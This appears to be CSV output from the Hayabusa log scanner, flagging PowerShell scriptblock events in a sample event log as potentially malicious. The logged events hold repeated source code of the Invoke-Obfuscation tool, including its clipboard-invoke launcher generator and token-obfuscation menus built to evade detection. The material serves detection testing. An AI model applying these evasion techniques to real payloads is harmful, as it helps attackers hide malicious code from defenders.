This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. 
$RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. 
$PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. 
If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. 
$PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. 
.PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. 
$Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. 
$MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. 
' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. 
Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. 
If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. 
If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. 
